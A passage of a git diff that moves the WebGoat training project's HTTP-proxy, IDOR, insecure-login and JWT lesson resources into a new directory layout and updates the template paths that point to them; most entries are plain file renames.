rename to src/main/resources/lessons/http_basics/i18n/WebGoatLabels_ru.properties
diff --git a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/0overview.adoc b/src/main/resources/lessons/http_proxies/documentation/0overview.adoc
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/0overview.adoc
rename to src/main/resources/lessons/http_proxies/documentation/0overview.adoc
diff --git a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/10burp.adoc b/src/main/resources/lessons/http_proxies/documentation/10burp.adoc
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/10burp.adoc
rename to src/main/resources/lessons/http_proxies/documentation/10burp.adoc
diff --git a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/1proxysetupsteps.adoc b/src/main/resources/lessons/http_proxies/documentation/1proxysetupsteps.adoc
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/1proxysetupsteps.adoc
rename to src/main/resources/lessons/http_proxies/documentation/1proxysetupsteps.adoc
diff --git a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/3browsersetup.adoc b/src/main/resources/lessons/http_proxies/documentation/3browsersetup.adoc
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/3browsersetup.adoc
rename to src/main/resources/lessons/http_proxies/documentation/3browsersetup.adoc
diff --git a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/5configurefilterandbreakpoints.adoc b/src/main/resources/lessons/http_proxies/documentation/5configurefilterandbreakpoints.adoc
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/5configurefilterandbreakpoints.adoc
rename to src/main/resources/lessons/http_proxies/documentation/5configurefilterandbreakpoints.adoc
diff --git a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/6assignment.adoc b/src/main/resources/lessons/http_proxies/documentation/6assignment.adoc
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/6assignment.adoc
rename to src/main/resources/lessons/http_proxies/documentation/6assignment.adoc
diff --git a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/7resend.adoc b/src/main/resources/lessons/http_proxies/documentation/7resend.adoc
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/7resend.adoc
rename to src/main/resources/lessons/http_proxies/documentation/7resend.adoc
diff --git a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/8httpsproxy.adoc b/src/main/resources/lessons/http_proxies/documentation/8httpsproxy.adoc
similarity index 98%
rename from webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/8httpsproxy.adoc
rename to src/main/resources/lessons/http_proxies/documentation/8httpsproxy.adoc
index 192a1953f..0c3875dfa 100644
--- a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/8httpsproxy.adoc
+++ b/src/main/resources/lessons/http_proxies/documentation/8httpsproxy.adoc
@@ -1,27 +1,27 @@
-== Proxy from ZAP to HTTPS
-
-The ZAP proxy can also be configured to proxy *HTTPS* requests. It will terminate the HTTPS connection in ZAP and then proxy it to the target using its keystore. You can even proxy to sites with mutual TLS. In that case, you configure OWASP ZAP with the keystore and key to use for the connection.
-
-Go to Tools/Options/Client Certificate to proxy to a mutual TLS HTTPS site.
-Go to Tools/Options/Connection if you want to set timeouts and want to force the use of TLSv1.2 e.g.
-
-
-=== Export the certificate
-
-Depending on the local tools installation, ZAP can start a browser directly with some adjusted options like network settings and certificate adjustments. However, you should do this step if you want to start your browser independently of ZAP. To be able to use the browser, the browser needs the certificate, which you can export here:
-
-image::images/rootca.png[ZAP root CA,style="lesson-image"]
-image::images/savecerts.png[ZAP save CA,style="lesson-image"]
-
-
-
-=== Import the OWASP ZAP root certificate
-
-. Go to your Firefox Preferences (Mac, Linux) or Options (Windows) from the menu.`
-. Search for _certificates_
-. Click _View certificates_
-. Import the ZAP root certificate that was saved (see the previous page)
-
-image::images/firefoxsettingscerts.png[Firefox Certificates,width="75%",style="lesson-image"]
-
-image::images/importcerts.png[Firefox Certificate import,width="75%",style="lesson-image"]
+== Proxy from ZAP to HTTPS
+
+The ZAP proxy can also be configured to proxy *HTTPS* requests. It will terminate the HTTPS connection in ZAP and then proxy it to the target using its keystore. You can even proxy to sites with mutual TLS. In that case, you configure OWASP ZAP with the keystore and key to use for the connection.
+
+Go to Tools/Options/Client Certificate to proxy to a mutual TLS HTTPS site.
+Go to Tools/Options/Connection if you want to set timeouts and want to force the use of TLSv1.2 e.g.
+
+
+=== Export the certificate
+
+Depending on the local tools installation, ZAP can start a browser directly with some adjusted options like network settings and certificate adjustments. However, you should do this step if you want to start your browser independently of ZAP. To be able to use the browser, the browser needs the certificate, which you can export here:
+
+image::images/rootca.png[ZAP root CA,style="lesson-image"]
+image::images/savecerts.png[ZAP save CA,style="lesson-image"]
+
+
+
+=== Import the OWASP ZAP root certificate
+
+. Go to your Firefox Preferences (Mac, Linux) or Options (Windows) from the menu.`
+. Search for _certificates_
+. Click _View certificates_
+. Import the ZAP root certificate that was saved (see the previous page)
+
+image::images/firefoxsettingscerts.png[Firefox Certificates,width="75%",style="lesson-image"]
+
+image::images/importcerts.png[Firefox Certificate import,width="75%",style="lesson-image"]
diff --git a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/9manual.adoc b/src/main/resources/lessons/http_proxies/documentation/9manual.adoc
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/9manual.adoc
rename to src/main/resources/lessons/http_proxies/documentation/9manual.adoc
diff --git a/webgoat-lessons/http-proxies/src/main/resources/html/HttpProxies.html b/src/main/resources/lessons/http_proxies/html/HttpProxies.html
similarity index 52%
rename from webgoat-lessons/http-proxies/src/main/resources/html/HttpProxies.html
rename to src/main/resources/lessons/http_proxies/html/HttpProxies.html
index 98f266c43..f916785db 100644
--- a/webgoat-lessons/http-proxies/src/main/resources/html/HttpProxies.html
+++ b/src/main/resources/lessons/http_proxies/html/HttpProxies.html
@@ -3,23 +3,23 @@
 <html xmlns:th="http://www.thymeleaf.org">
 
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:0overview.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/http_proxies/documentation/0overview.adoc"></div>
     </div>
 
     <div class="lesson-page-wrapper">
-		<div class="adoc-content" th:replace="doc:1proxysetupsteps.adoc"></div>
+		<div class="adoc-content" th:replace="doc:lessons/http_proxies/documentation/1proxysetupsteps.adoc"></div>
 	</div>
 
     <div class="lesson-page-wrapper">
-		<div class="adoc-content" th:replace="doc:3browsersetup.adoc"></div>
+		<div class="adoc-content" th:replace="doc:lessons/http_proxies/documentation/3browsersetup.adoc"></div>
 	</div>
 
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:5configurefilterandbreakpoints.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/http_proxies/documentation/5configurefilterandbreakpoints.adoc"></div>
     </div>
 
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:6assignment.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/http_proxies/documentation/6assignment.adoc"></div>
         <div class="attack-container">
             <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
             <form class="attack-form" accept-charset="UNKNOWN" name="intercept-request"
@@ -36,15 +36,15 @@
     </div>
 
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:7resend.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/http_proxies/documentation/7resend.adoc"></div>
     </div>
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:8httpsproxy.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/http_proxies/documentation/8httpsproxy.adoc"></div>
     </div>
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:9manual.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/http_proxies/documentation/9manual.adoc"></div>
     </div>
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:10burp.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/http_proxies/documentation/10burp.adoc"></div>
     </div>
 </html>
diff --git a/webgoat-lessons/http-proxies/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/http_proxies/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/http_proxies/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/breakpoint.png b/src/main/resources/lessons/http_proxies/images/breakpoint.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/breakpoint.png
rename to src/main/resources/lessons/http_proxies/images/breakpoint.png
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/breakpoint2.png b/src/main/resources/lessons/http_proxies/images/breakpoint2.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/breakpoint2.png
rename to src/main/resources/lessons/http_proxies/images/breakpoint2.png
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/burpfilter.png b/src/main/resources/lessons/http_proxies/images/burpfilter.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/burpfilter.png
rename to src/main/resources/lessons/http_proxies/images/burpfilter.png
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/burpfilterclient.png b/src/main/resources/lessons/http_proxies/images/burpfilterclient.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/burpfilterclient.png
rename to src/main/resources/lessons/http_proxies/images/burpfilterclient.png
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/burpintercept.png b/src/main/resources/lessons/http_proxies/images/burpintercept.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/burpintercept.png
rename to src/main/resources/lessons/http_proxies/images/burpintercept.png
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/burpintercepted.png b/src/main/resources/lessons/http_proxies/images/burpintercepted.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/burpintercepted.png
rename to src/main/resources/lessons/http_proxies/images/burpintercepted.png
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/burpproxy.png b/src/main/resources/lessons/http_proxies/images/burpproxy.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/burpproxy.png
rename to src/main/resources/lessons/http_proxies/images/burpproxy.png
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/burpwarn.png b/src/main/resources/lessons/http_proxies/images/burpwarn.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/burpwarn.png
rename to src/main/resources/lessons/http_proxies/images/burpwarn.png
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/chrome-manual-proxy-win.png b/src/main/resources/lessons/http_proxies/images/chrome-manual-proxy-win.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/chrome-manual-proxy-win.png
rename to src/main/resources/lessons/http_proxies/images/chrome-manual-proxy-win.png
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/chrome-manual-proxy.png b/src/main/resources/lessons/http_proxies/images/chrome-manual-proxy.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/chrome-manual-proxy.png
rename to src/main/resources/lessons/http_proxies/images/chrome-manual-proxy.png
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/firefox-proxy-config.png b/src/main/resources/lessons/http_proxies/images/firefox-proxy-config.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/firefox-proxy-config.png
rename to src/main/resources/lessons/http_proxies/images/firefox-proxy-config.png
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/firefoxsettingscerts.png b/src/main/resources/lessons/http_proxies/images/firefoxsettingscerts.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/firefoxsettingscerts.png
rename to src/main/resources/lessons/http_proxies/images/firefoxsettingscerts.png
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/importcerts.png b/src/main/resources/lessons/http_proxies/images/importcerts.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/importcerts.png
rename to src/main/resources/lessons/http_proxies/images/importcerts.png
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/loginscreen.png b/src/main/resources/lessons/http_proxies/images/loginscreen.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/loginscreen.png
rename to src/main/resources/lessons/http_proxies/images/loginscreen.png
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/newlocalhost.png b/src/main/resources/lessons/http_proxies/images/newlocalhost.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/newlocalhost.png
rename to src/main/resources/lessons/http_proxies/images/newlocalhost.png
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/proxy-intercept-button.png b/src/main/resources/lessons/http_proxies/images/proxy-intercept-button.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/proxy-intercept-button.png
rename to src/main/resources/lessons/http_proxies/images/proxy-intercept-button.png
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/proxy-intercept-details.png b/src/main/resources/lessons/http_proxies/images/proxy-intercept-details.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/proxy-intercept-details.png
rename to src/main/resources/lessons/http_proxies/images/proxy-intercept-details.png
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/rootca.png b/src/main/resources/lessons/http_proxies/images/rootca.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/rootca.png
rename to src/main/resources/lessons/http_proxies/images/rootca.png
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/savecerts.png b/src/main/resources/lessons/http_proxies/images/savecerts.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/savecerts.png
rename to src/main/resources/lessons/http_proxies/images/savecerts.png
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/zap-browser-button.png b/src/main/resources/lessons/http_proxies/images/zap-browser-button.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/zap-browser-button.png
rename to src/main/resources/lessons/http_proxies/images/zap-browser-button.png
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/zap-exclude.png b/src/main/resources/lessons/http_proxies/images/zap-exclude.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/zap-exclude.png
rename to src/main/resources/lessons/http_proxies/images/zap-exclude.png
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/zap-history.png b/src/main/resources/lessons/http_proxies/images/zap-history.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/zap-history.png
rename to src/main/resources/lessons/http_proxies/images/zap-history.png
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/zap-start.png b/src/main/resources/lessons/http_proxies/images/zap-start.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/zap-start.png
rename to src/main/resources/lessons/http_proxies/images/zap-start.png
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/zap_edit_and_resend.png b/src/main/resources/lessons/http_proxies/images/zap_edit_and_resend.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/zap_edit_and_resend.png
rename to src/main/resources/lessons/http_proxies/images/zap_edit_and_resend.png
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/zap_edit_and_response.png b/src/main/resources/lessons/http_proxies/images/zap_edit_and_response.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/zap_edit_and_response.png
rename to src/main/resources/lessons/http_proxies/images/zap_edit_and_response.png
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/zap_edit_and_send.png b/src/main/resources/lessons/http_proxies/images/zap_edit_and_send.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/zap_edit_and_send.png
rename to src/main/resources/lessons/http_proxies/images/zap_edit_and_send.png
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/zap_exclude.png b/src/main/resources/lessons/http_proxies/images/zap_exclude.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/zap_exclude.png
rename to src/main/resources/lessons/http_proxies/images/zap_exclude.png
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/zap_exclude_url.png b/src/main/resources/lessons/http_proxies/images/zap_exclude_url.png
similarity index 100%
rename from webgoat-lessons/http-proxies/src/main/resources/images/zap_exclude_url.png
rename to src/main/resources/lessons/http_proxies/images/zap_exclude_url.png
diff --git a/webgoat-lessons/idor/src/main/resources/lessonPlans/en/IDOR_editOtherProfile.adoc b/src/main/resources/lessons/idor/documentation/IDOR_editOtherProfile.adoc
similarity index 100%
rename from webgoat-lessons/idor/src/main/resources/lessonPlans/en/IDOR_editOtherProfile.adoc
rename to src/main/resources/lessons/idor/documentation/IDOR_editOtherProfile.adoc
diff --git a/webgoat-lessons/idor/src/main/resources/lessonPlans/en/IDOR_editOwnProfile.adoc b/src/main/resources/lessons/idor/documentation/IDOR_editOwnProfile.adoc
similarity index 100%
rename from webgoat-lessons/idor/src/main/resources/lessonPlans/en/IDOR_editOwnProfile.adoc
rename to src/main/resources/lessons/idor/documentation/IDOR_editOwnProfile.adoc
diff --git a/webgoat-lessons/idor/src/main/resources/lessonPlans/en/IDOR_inputAltPath.adoc b/src/main/resources/lessons/idor/documentation/IDOR_inputAltPath.adoc
similarity index 100%
rename from webgoat-lessons/idor/src/main/resources/lessonPlans/en/IDOR_inputAltPath.adoc
rename to src/main/resources/lessons/idor/documentation/IDOR_inputAltPath.adoc
diff --git a/webgoat-lessons/idor/src/main/resources/lessonPlans/en/IDOR_intro.adoc b/src/main/resources/lessons/idor/documentation/IDOR_intro.adoc
similarity index 100%
rename from webgoat-lessons/idor/src/main/resources/lessonPlans/en/IDOR_intro.adoc
rename to src/main/resources/lessons/idor/documentation/IDOR_intro.adoc
diff --git a/webgoat-lessons/idor/src/main/resources/lessonPlans/en/IDOR_login.adoc b/src/main/resources/lessons/idor/documentation/IDOR_login.adoc
similarity index 100%
rename from webgoat-lessons/idor/src/main/resources/lessonPlans/en/IDOR_login.adoc
rename to src/main/resources/lessons/idor/documentation/IDOR_login.adoc
diff --git a/webgoat-lessons/idor/src/main/resources/lessonPlans/en/IDOR_mitigation.adoc b/src/main/resources/lessons/idor/documentation/IDOR_mitigation.adoc
similarity index 100%
rename from webgoat-lessons/idor/src/main/resources/lessonPlans/en/IDOR_mitigation.adoc
rename to src/main/resources/lessons/idor/documentation/IDOR_mitigation.adoc
diff --git a/webgoat-lessons/idor/src/main/resources/lessonPlans/en/IDOR_viewDiffs.adoc b/src/main/resources/lessons/idor/documentation/IDOR_viewDiffs.adoc
similarity index 100%
rename from webgoat-lessons/idor/src/main/resources/lessonPlans/en/IDOR_viewDiffs.adoc
rename to src/main/resources/lessons/idor/documentation/IDOR_viewDiffs.adoc
diff --git a/webgoat-lessons/idor/src/main/resources/lessonPlans/en/IDOR_viewOtherProfile.adoc b/src/main/resources/lessons/idor/documentation/IDOR_viewOtherProfile.adoc
similarity index 100%
rename from webgoat-lessons/idor/src/main/resources/lessonPlans/en/IDOR_viewOtherProfile.adoc
rename to src/main/resources/lessons/idor/documentation/IDOR_viewOtherProfile.adoc
diff --git a/webgoat-lessons/idor/src/main/resources/lessonPlans/en/IDOR_viewOwnAltPath.adoc b/src/main/resources/lessons/idor/documentation/IDOR_viewOwnAltPath.adoc
similarity index 100%
rename from webgoat-lessons/idor/src/main/resources/lessonPlans/en/IDOR_viewOwnAltPath.adoc
rename to src/main/resources/lessons/idor/documentation/IDOR_viewOwnAltPath.adoc
diff --git a/webgoat-lessons/idor/src/main/resources/lessonPlans/en/IDOR_whatDiffs.adoc b/src/main/resources/lessons/idor/documentation/IDOR_whatDiffs.adoc
similarity index 100%
rename from webgoat-lessons/idor/src/main/resources/lessonPlans/en/IDOR_whatDiffs.adoc
rename to src/main/resources/lessons/idor/documentation/IDOR_whatDiffs.adoc
diff --git a/webgoat-lessons/idor/src/main/resources/lessonPlans/en/temp.txt b/src/main/resources/lessons/idor/documentation/temp.txt
similarity index 100%
rename from webgoat-lessons/idor/src/main/resources/lessonPlans/en/temp.txt
rename to src/main/resources/lessons/idor/documentation/temp.txt
diff --git a/webgoat-lessons/idor/src/main/resources/html/IDOR.html b/src/main/resources/lessons/idor/html/IDOR.html
similarity index 91%
rename from webgoat-lessons/idor/src/main/resources/html/IDOR.html
rename to src/main/resources/lessons/idor/html/IDOR.html
index 77f58adbd..b4b7f530f 100644
--- a/webgoat-lessons/idor/src/main/resources/html/IDOR.html
+++ b/src/main/resources/lessons/idor/html/IDOR.html
@@ -4,14 +4,14 @@
     <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
     <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
     which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-    <div class="adoc-content" th:replace="doc:IDOR_intro.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/idor/documentation/IDOR_intro.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
     <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
     <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
     which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-    <div class="adoc-content" th:replace="doc:IDOR_login.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/idor/documentation/IDOR_login.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <!-- using attack-form class on your form, will allow your request to be ajaxified and stay within the display framework for webgoat -->
@@ -46,7 +46,7 @@
     <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
     <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
     which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-    <div class="adoc-content" th:replace="doc:IDOR_viewDiffs.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/idor/documentation/IDOR_viewDiffs.adoc"></div>
     <div class="nonattack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <!-- using attack-form class on your form, will allow your request to be ajaxified and stay within the display framework for webgoat -->
@@ -76,7 +76,7 @@
         <!-- using attack-form class on your form will allow your request to be ajaxified and stay within the display framework for webgoat -->
         <!-- you can write your own custom forms, but standard form submission will take you to your endpoint and outside of the WebGoat framework -->
         <!-- of course, you can write your own ajax submission /handling in your own javascript if you like -->
-        <div class="adoc-content" th:replace="doc:IDOR_whatDiffs.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/idor/documentation/IDOR_whatDiffs.adoc"></div>
         <!-- modify the action to point to the intended endpoint -->
         <form class="attack-form"
               method="POST" name="diff-form"
@@ -96,7 +96,7 @@
     <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
     <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
     which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-    <div class="adoc-content" th:replace="doc:IDOR_viewOwnAltPath.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/idor/documentation/IDOR_viewOwnAltPath.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <!-- using attack-form class on your form, will allow your request to be ajaxified and stay within the display framework for webgoat -->
@@ -108,7 +108,7 @@
         <form class="attack-form" accept-charset="UNKNOWN"
               method="POST" name="form"
               action="/WebGoat/IDOR/profile/alt-path">
-            <div class="adoc-content" th:replace="doc:IDOR_inputAltPath.adoc"></div>
+            <div class="adoc-content" th:replace="doc:lessons/idor/documentation/IDOR_inputAltPath.adoc"></div>
             <input name="url" value="WebGoat/" type="text"/>
             <input name="submit" value="Submit" type="SUBMIT"/>
         </form>
@@ -123,7 +123,7 @@
     <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
     <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
     which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-    <div class="adoc-content" th:replace="doc:IDOR_viewOtherProfile.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/idor/documentation/IDOR_viewOtherProfile.adoc"></div>
     <div class="nonattack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <!-- using attack-form class on your form, will allow your request to be ajaxified and stay within the display framework for webgoat -->
@@ -147,7 +147,7 @@
         <!-- ... of course, you can move them if you want to, but that will not look consistent to other lessons -->
     </div>
 
-    <div class="adoc-content" th:replace="doc:IDOR_editOtherProfile.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/idor/documentation/IDOR_editOtherProfile.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <!-- using attack-form class on your form, will allow your request to be ajaxified and stay within the display framework for webgoat -->
@@ -176,7 +176,7 @@
     <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
     <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
     which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-    <div class="adoc-content" th:replace="doc:IDOR_mitigation.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/idor/documentation/IDOR_mitigation.adoc"></div>
 </div>
 
 </html>
diff --git a/webgoat-lessons/idor/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/idor/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/idor/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/idor/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/idor/src/main/resources/js/idor.js b/src/main/resources/lessons/idor/js/idor.js
similarity index 100%
rename from webgoat-lessons/idor/src/main/resources/js/idor.js
rename to src/main/resources/lessons/idor/js/idor.js
diff --git a/webgoat-lessons/insecure-login/src/main/resources/lessonPlans/en/InsecureLogin_Intro.adoc b/src/main/resources/lessons/insecure_login/documentation/InsecureLogin_Intro.adoc
similarity index 100%
rename from webgoat-lessons/insecure-login/src/main/resources/lessonPlans/en/InsecureLogin_Intro.adoc
rename to src/main/resources/lessons/insecure_login/documentation/InsecureLogin_Intro.adoc
diff --git a/webgoat-lessons/insecure-login/src/main/resources/lessonPlans/en/InsecureLogin_Task.adoc b/src/main/resources/lessons/insecure_login/documentation/InsecureLogin_Task.adoc
similarity index 100%
rename from webgoat-lessons/insecure-login/src/main/resources/lessonPlans/en/InsecureLogin_Task.adoc
rename to src/main/resources/lessons/insecure_login/documentation/InsecureLogin_Task.adoc
diff --git a/webgoat-lessons/insecure-login/src/main/resources/html/InsecureLogin.html b/src/main/resources/lessons/insecure_login/html/InsecureLogin.html
similarity index 86%
rename from webgoat-lessons/insecure-login/src/main/resources/html/InsecureLogin.html
rename to src/main/resources/lessons/insecure_login/html/InsecureLogin.html
index 7415bf0f1..1c34ab781 100755
--- a/webgoat-lessons/insecure-login/src/main/resources/html/InsecureLogin.html
+++ b/src/main/resources/lessons/insecure_login/html/InsecureLogin.html
@@ -6,12 +6,12 @@
         <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
         <!-- include content here. Content will be presented via asciidocs files,
         which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-        <div class="adoc-content" th:replace="doc:InsecureLogin_Intro.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/insecure_login/documentation/InsecureLogin_Intro.adoc"></div>
     </div>
 
     <div class="lesson-page-wrapper">
         <!-- stripped down without extra comments -->
-        <div class="adoc-content" th:replace="doc:InsecureLogin_Task.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/insecure_login/documentation/InsecureLogin_Task.adoc"></div>
         <div class="attack-container">
             <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
             <script th:src="@{/lesson_js/credentials.js}"></script>
diff --git a/webgoat-lessons/insecure-login/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/insecure_login/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/insecure-login/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/insecure_login/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/insecure-login/src/main/resources/js/credentials.js b/src/main/resources/lessons/insecure_login/js/credentials.js
similarity index 100%
rename from webgoat-lessons/insecure-login/src/main/resources/js/credentials.js
rename to src/main/resources/lessons/insecure_login/js/credentials.js
diff --git a/webgoat-lessons/jwt/src/main/resources/css/jwt.css b/src/main/resources/lessons/jwt/css/jwt.css
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/css/jwt.css
rename to src/main/resources/lessons/jwt/css/jwt.css
diff --git a/webgoat-lessons/jwt/src/main/resources/db/migration/V2019_09_25_1__jwt.sql b/src/main/resources/lessons/jwt/db/migration/V2019_09_25_1__jwt.sql
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/db/migration/V2019_09_25_1__jwt.sql
rename to src/main/resources/lessons/jwt/db/migration/V2019_09_25_1__jwt.sql
diff --git a/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_decode.adoc b/src/main/resources/lessons/jwt/documentation/JWT_decode.adoc
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_decode.adoc
